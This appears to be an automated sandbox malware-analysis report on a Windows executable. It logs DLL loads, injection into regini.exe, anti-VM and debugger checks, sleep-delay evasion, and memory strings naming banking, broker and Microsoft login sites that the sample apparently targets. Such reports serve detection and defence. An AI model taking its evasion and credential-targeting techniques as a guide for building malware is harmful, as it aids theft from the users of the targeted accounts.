                Source: C:\Users\user\Desktop\BcF3o0Egke.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: BcF3o0Egke.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: BcF3o0Egke.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: BcF3o0Egke.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: GpHAn.pdb source: BcF3o0Egke.exe
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ysdBLufRFxAq.exe, 00000006.00000000.2366003816.000000000070E000.00000002.00000001.01000000.0000000C.sdmp, ysdBLufRFxAq.exe, 00000009.00000000.2522895331.000000000070E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: BcF3o0Egke.exe, 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000007.00000003.2448577877.0000000003450000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000003.2445542520.00000000032A4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: BcF3o0Egke.exe, BcF3o0Egke.exe, 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, regini.exe, regini.exe, 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000007.00000003.2448577877.0000000003450000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000003.2445542520.00000000032A4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: regini.pdbGCTL source: BcF3o0Egke.exe, 00000005.00000002.2441514476.00000000010F7000.00000004.00000020.00020000.00000000.sdmp, ysdBLufRFxAq.exe, 00000006.00000002.3935408819.0000000001358000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: GpHAn.pdbSHA256 source: BcF3o0Egke.exe
                Source: Binary string: regini.pdb source: BcF3o0Egke.exe, 00000005.00000002.2441514476.00000000010F7000.00000004.00000020.00020000.00000000.sdmp, ysdBLufRFxAq.exe, 00000006.00000002.3935408819.0000000001358000.00000004.00000020.00020000.00000000.sdmp
                Source: BcF3o0Egke.exeStatic PE information: 0xB48F262A [Tue Dec 29 02:44:58 2065 UTC]
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 0_2_069AF8B0 push esp; retf 0_2_069AF8B1
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 0_2_07275E1F push es; ret 0_2_07275E21
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 0_2_07275E93 push eax; ret 0_2_07275E94
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 0_2_0727653A push F00726DDh; ret 0_2_07276545
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 0_2_07275D1D push es; ret 0_2_07275D1F
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 0_2_07273D92 push esp; retf 0_2_07273D99
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 0_2_07276420 push ecx; ret 0_2_0727642E
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 0_2_07275C2E push es; ret 0_2_07275C2F
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 0_2_07276460 push ecx; ret 0_2_0727646E
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 0_2_07275CBD push eax; ret 0_2_07275CBF
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 0_2_07276320 push ecx; ret 0_2_07276321
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 0_2_07276301 push ecx; ret 0_2_07276303
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 0_2_07271B7E push es; ret 0_2_07271B80
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 0_2_072763AF push ecx; ret 0_2_072763BE
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 0_2_07275BF2 push es; ret 0_2_07275BFC
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 0_2_072713FF push cs; ret 0_2_0727140E
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 0_2_07276267 push ecx; ret 0_2_07276268
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 0_2_07276248 push ecx; ret 0_2_07276254
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 0_2_072762D6 push ecx; ret 0_2_072762DB
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 0_2_07272150 push es; ret 0_2_0727216F
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 0_2_07276180 push eax; ret 0_2_0727618E
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 0_2_072760A7 push eax; ret 0_2_072760B6
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 0_2_07272098 push es; ret 0_2_072720B7
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 0_2_072708F8 push cs; ret 0_2_07270906
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0040D066 push cs; retf 5_2_0040D068
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_00416123 push ecx; iretd 5_2_00416145
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0041692E push eax; ret 5_2_00416930
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_004031F0 push eax; ret 5_2_004031F2
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0040D192 push 32D5BE83h; retf 5_2_0040D19A
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_004082F0 push cs; ret 5_2_004082FD
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_004192F0 pushad ; retf 5_2_004192F2
                Source: BcF3o0Egke.exeStatic PE information: section name: .text entropy: 6.961995643853877
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: BcF3o0Egke.exe PID: 432, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\regini.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
                Source: C:\Windows\SysWOW64\regini.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
                Source: C:\Windows\SysWOW64\regini.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
                Source: C:\Windows\SysWOW64\regini.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
                Source: C:\Windows\SysWOW64\regini.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
                Source: C:\Windows\SysWOW64\regini.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
                Source: C:\Windows\SysWOW64\regini.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
                Source: C:\Windows\SysWOW64\regini.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeMemory allocated: BC0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeMemory allocated: 2530000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeMemory allocated: 4530000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeMemory allocated: 8880000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeMemory allocated: 73C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeMemory allocated: 9880000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeMemory allocated: A880000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015C096E rdtsc 5_2_015C096E
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeAPI coverage: 0.8 %
                Source: C:\Windows\SysWOW64\regini.exeAPI coverage: 2.7 %
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe TID: 6352Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\regini.exe TID: 6756Thread sleep count: 41 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\regini.exe TID: 6756Thread sleep time: -82000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe TID: 6760Thread sleep time: -55000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe TID: 6760Thread sleep time: -39000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\regini.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E1C8D0 FindFirstFileW,FindNextFileW,FindClose,7_2_02E1C8D0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: 7046-nn1K.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: 7046-nn1K.7.drBinary or memory string: discord.comVMware20,11696428655f
                Source: 7046-nn1K.7.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: 7046-nn1K.7.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: 7046-nn1K.7.drBinary or memory string: global block list test formVMware20,11696428655
                Source: 7046-nn1K.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: 7046-nn1K.7.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: 7046-nn1K.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: 7046-nn1K.7.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: 7046-nn1K.7.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: 7046-nn1K.7.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: 7046-nn1K.7.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: 7046-nn1K.7.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: 7046-nn1K.7.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: 7046-nn1K.7.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: regini.exe, 00000007.00000002.3935086502.00000000030BD000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2755260479.00000173B7E0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 7046-nn1K.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: 7046-nn1K.7.drBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: 7046-nn1K.7.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: 7046-nn1K.7.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: 7046-nn1K.7.drBinary or memory string: AMC password management pageVMware20,11696428655
                Source: 7046-nn1K.7.drBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: 7046-nn1K.7.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: 7046-nn1K.7.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: 7046-nn1K.7.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: 7046-nn1K.7.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: 7046-nn1K.7.drBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: ysdBLufRFxAq.exe, 00000009.00000002.3935669937.00000000008DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll0
                Source: 7046-nn1K.7.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: 7046-nn1K.7.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: 7046-nn1K.7.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: 7046-nn1K.7.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: 7046-nn1K.7.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015C096E rdtsc 5_2_015C096E
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_00417A73 LdrLoadDll,5_2_00417A73
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0157C156 mov eax, dword ptr fs:[00000030h]5_2_0157C156
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01586154 mov eax, dword ptr fs:[00000030h]5_2_01586154
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01586154 mov eax, dword ptr fs:[00000030h]5_2_01586154
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01614144 mov eax, dword ptr fs:[00000030h]5_2_01614144
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01614144 mov eax, dword ptr fs:[00000030h]5_2_01614144
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01614144 mov ecx, dword ptr fs:[00000030h]5_2_01614144
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01614144 mov eax, dword ptr fs:[00000030h]5_2_01614144
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01614144 mov eax, dword ptr fs:[00000030h]5_2_01614144
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01618158 mov eax, dword ptr fs:[00000030h]5_2_01618158
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0162E10E mov eax, dword ptr fs:[00000030h]5_2_0162E10E
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0162E10E mov ecx, dword ptr fs:[00000030h]5_2_0162E10E
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0162E10E mov eax, dword ptr fs:[00000030h]5_2_0162E10E
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0162E10E mov eax, dword ptr fs:[00000030h]5_2_0162E10E
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0162E10E mov ecx, dword ptr fs:[00000030h]5_2_0162E10E
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0162E10E mov eax, dword ptr fs:[00000030h]5_2_0162E10E
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0162E10E mov eax, dword ptr fs:[00000030h]5_2_0162E10E
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0162E10E mov ecx, dword ptr fs:[00000030h]5_2_0162E10E
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0162E10E mov eax, dword ptr fs:[00000030h]5_2_0162E10E
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0162E10E mov ecx, dword ptr fs:[00000030h]5_2_0162E10E
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01640115 mov eax, dword ptr fs:[00000030h]5_2_01640115
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0162A118 mov ecx, dword ptr fs:[00000030h]5_2_0162A118
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0162A118 mov eax, dword ptr fs:[00000030h]5_2_0162A118
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0162A118 mov eax, dword ptr fs:[00000030h]5_2_0162A118
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0162A118 mov eax, dword ptr fs:[00000030h]5_2_0162A118
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015B0124 mov eax, dword ptr fs:[00000030h]5_2_015B0124
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016561E5 mov eax, dword ptr fs:[00000030h]5_2_016561E5
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015FE1D0 mov eax, dword ptr fs:[00000030h]5_2_015FE1D0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015FE1D0 mov eax, dword ptr fs:[00000030h]5_2_015FE1D0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015FE1D0 mov ecx, dword ptr fs:[00000030h]5_2_015FE1D0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015FE1D0 mov eax, dword ptr fs:[00000030h]5_2_015FE1D0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015FE1D0 mov eax, dword ptr fs:[00000030h]5_2_015FE1D0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015B01F8 mov eax, dword ptr fs:[00000030h]5_2_015B01F8
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016461C3 mov eax, dword ptr fs:[00000030h]5_2_016461C3
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016461C3 mov eax, dword ptr fs:[00000030h]5_2_016461C3
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0157A197 mov eax, dword ptr fs:[00000030h]5_2_0157A197
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0157A197 mov eax, dword ptr fs:[00000030h]5_2_0157A197
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0157A197 mov eax, dword ptr fs:[00000030h]5_2_0157A197
